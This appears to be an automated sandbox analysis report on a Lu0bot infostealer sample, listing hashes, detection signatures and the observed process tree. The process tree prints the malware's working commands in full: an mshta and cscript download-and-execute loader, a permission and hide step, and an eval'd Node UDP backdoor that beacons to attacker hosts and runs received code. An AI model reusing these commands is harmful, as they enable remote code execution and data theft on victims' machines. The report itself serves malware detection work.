Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-08-2021 10:12
General
-
Target
usfive_20210804-120800.exe
-
Size
2KB
-
MD5
ae597b5df58ab4f01867bb5eaac93efd
-
SHA1
c8a13f566a130f18507e824e1e5c167b186a65a7
-
SHA256
a565b1d26d7c7ea28aad5f1c23fb5c055198d200147589c7dc36e3e1fa13e119
-
SHA512
fd978db8ff6d1fc7625ec996938022d3e191a5b58d7dcd0a430f80e1558f4986aaaeff2cc57f0d21451905d24494f7c5581b349e2d75d28a77e5430309f13afa
Score
10/10
Malware Config
Signatures
-
Lu0bot
Lu0bot is a lightweight infostealer written in NodeJS.
-
suricata: ET MALWARE lu0bot Loader HTTP Request
-
suricata: ET MALWARE lu0bot Loader HTTP Response
-
Blocklisted process makes network request 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
NTFS ADS 2 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of WriteProcessMemory 51 IoCs
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210804-120800.exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210804-120800.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();159;y=unescape('%361%7Eh%74t%70%3A%2F%2F%61s%750%37%2E%66u%6E%2F%68r%69%2F%3F2%31a%36e%34b%7E2%31').split('~');56;try{x='WinHttp';176;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);251;x.send();120;y='ipt.S';132;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);32;}catch(e){};239;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1628071956320.txt & cscript /nologo /e:jscript get1628071956320.txt "http%3A%2F%2Fasu07.fun%2Fhri%2F%3F22ce76d60%26b%3D1c63848f" node.cab & expand node.cab node.exe & del get1628071956320.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1628071956320.txt & cscript /nologo /e:jscript get1628071956320.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1628071956320.txt3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1628071956320.txt "http%3A%2F%2Fasu07.fun%2Fhri%2F%3F22ce76d60%26b%3D1c63848f" node.cab4⤵
- Blocklisted process makes network request
-
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
-
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1628071956320.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵
-
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
-
-
C:\Windows\SysWOW64\route.exeroute.exe print6⤵
-
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB